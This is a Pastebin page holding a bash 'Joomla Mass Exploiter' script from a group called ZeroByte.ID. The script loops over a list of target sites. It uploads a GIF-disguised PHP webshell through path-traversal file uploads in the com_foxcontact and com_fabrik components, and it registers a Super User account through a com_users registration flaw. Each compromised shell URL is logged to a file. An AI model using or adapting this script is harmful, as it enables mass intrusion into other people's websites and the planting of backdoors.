SHARE
TWEET

jembot

a guest Dec 23rd, 2017 583 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # http://blog.zerobyte.id/
  3.  
  4. ## EDIT HERE ##
  5. shell_log="webshell.txt";
  6. email="novran@equnix.asia";
  7. ## EOF ##
  8.  
  9. shell='GIF89a;'$(echo -ne '\n\r\n')'<title>ZeroByte.ID</title>'$(echo -ne '\n\r\n')'<pre><b>ZeroByte.ID Uploader</b></pre>'$(echo -ne '\n\r\n')'<?php $files = @$_FILES["files"];if ($files["name"] != "") {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files["tmp_name"], $fullpath)){echo "<a href=\"$fullpath\">Done! click here.</a>";}}?><form method=POST enctype="multipart/form-data" action="">'$(echo -ne '\n\r\n')'<input type=text name=path><input type="file" name="files">'$(echo -ne '\n\r\n')'<br><input type=submit value="Upload">'$(echo -ne '\n\r\n')'</form>';
  10. function foxcontact(){
  11.     victim=$1;
  12.     rand=$(shuf -i 10000-99999 -n 1);
  13.     filename="shell_"$rand".php";
  14.     mids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"mid_' | sed 's|<a name="mid_||g' | sed 's|"></a>||g');
  15.     cids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"cid_' | sed 's|<a name="cid_||g' | sed 's|"></a>||g');
  16.     webshell=$victim"/components/com_foxcontact/"$filename;
  17.     if [[ ! -z "$mids" ]];then
  18.         mid=$mids;
  19.         cid=0;
  20.     elif [[ ! -z "$cids" ]];then
  21.         mid=0;
  22.         cid=$cids;
  23.     else
  24.         echo '[BAD] Com_Foxcontact CID & MID are empty.';
  25.         return 1;
  26.     fi
  27.  
  28.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/file-uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  29.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  30.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  31.         echo $webshell >> $shell_log;
  32.         return 1;
  33.     else
  34.         echo -ne '';
  35.     fi
  36.  
  37.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id="${cid}"&cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  38.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  39.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  40.         echo $webshell >> $shell_log
  41.         return 1;
  42.     else
  43.         echo -ne '';
  44.     fi
  45.  
  46.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id="${cid}"&cid="${cid}"&mid="${mid}"&owner=module&id="${cid}"&qqfile=/../../"$filename;
  47.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  48.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  49.         echo $webshell >> $shell_log
  50.         return 1;
  51.     else
  52.         echo -ne '';
  53.     fi
  54.  
  55.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  56.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  57.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  58.         echo $webshell >> $shell_log
  59.         return 1;
  60.     else
  61.         echo -ne '';
  62.     fi
  63.     echo '[BAD] Com_Foxcontact Not Vulnerable.';
  64. }
  65.  
  66.  
  67. function fabrik(){
  68.     victim=$1;
  69.     shuf -i 1000-9999 -n 1 > namerand.tmp
  70.     filename='cache_'$(cat namerand.tmp)'.php';
  71.     echo $shell > $filename;
  72.     exploit=$(timeout 10 curl -s -F "file=@"$filename $victim"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload");
  73.  
  74.         if [[ $exploit =~ $filename ]]; then
  75.             echo '[OK] Shell: '$domain'/'$filename;
  76.             echo $domain'/'$filename >> $shell_log;
  77.         else
  78.             echo '[BAD] Com_Fabrik Not Vulnerable.';
  79.         fi
  80.  
  81.     rm -f $filename;
  82.     rm -f namerand.tmp;
  83. }
  84.  
  85.  
  86. function comusers(){
  87.     victim=$1;
  88.     if [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.7 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.7 - Open Source Content Management' ]]; then
  89.         echo -ne '';
  90.     elif [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.6 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.6 - Open Source Content Management' ]]; then
  91.         echo -ne '';
  92.     else
  93.         echo '[BAD] Com_Users Not Vulnerable.'
  94.         return 1;
  95.     fi
  96.  
  97.     # GET HIDDEN VALUE
  98.     curl -s --cookie-jar cookie_com_users.tmp $victim"/index.php?option=com_users&view=registration" | grep -A 2 '<input type="hidden" name="task" value="registration.register"' | grep '" value="1"' | sed 's|" value="1"|\n|g' | head -1 | sed 's|<input type="hidden" name="|\ntoked: |g' | grep 'toked:' | awk '{print $2}' > token_com_users.txt;
  99.     token=$(cat token_com_users.txt);
  100.     if [[ -z $token ]];then
  101.         echo '[BAD] Com_Users cannot get token.'
  102.         return 1
  103.     else
  104.         echo -ne '';
  105.     fi
  106.     username="zerobyte7";
  107.     password="123456";
  108.     curl -s -L -b cookie_com_users.tmp -d "jform[name]=Zerobyte.ID Exploiter" -d "jform[username]="$username -d "jform[password1]=12345678" -d "jform[password2]=kkk0ntol" -d "jform[email1]="$email -d "jform[email2]="$email -d "jform[groups][]=7" -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 1.txt;
  109.     if [[ $(cat 1.txt) =~ $email ]];then
  110.         echo -ne '';
  111.     else
  112.         echo '[BAD] Com_Users cannot find web-form.';
  113.         return 1
  114.     fi
  115.     curl -s -L -b cookie_com_users.tmp -d "jform[name]=Zerobyte.ID Exploiter" -d "jform[username]="$username -d "jform[password1]="$password -d "jform[password2]="$password -d "jform[email1]="$email -d "jform[email2]="$email -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 2.txt;
  116.     if [[ $(cat 2.txt) =~ 'jform[password1]' ]];then
  117.         echo '[BAD] Com_Users failed exploitation.'
  118.     else
  119.         echo '[OK] Com_Users Exploited with ['$username':'$password'], open your email for verification.';
  120.         return 1
  121.     fi
  122.     rm -f cookie_com_users.tmp
  123.     rm -f 1.txt
  124.     rm -f 2.txt
  125. }
  126.  
  127. cat << "CRE"
  128.  _____              _           _         _     _
  129. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  130.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  131.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  132. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  133.                           |___/                  
  134. ----------- schopath [at] zerobyte.id -----------
  135. ----------- Joomla Mass Exploiter V.1 -----------
  136. -------------------------------------------------
  137.  
  138. CRE
  139.  
  140. list=$1;
  141. for target in $(cat $list); do
  142.     echo '[+] Try: '$target;
  143.     foxcontact $target
  144.     fabrik $target
  145.     comusers $target
  146.     echo '';
  147. done
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top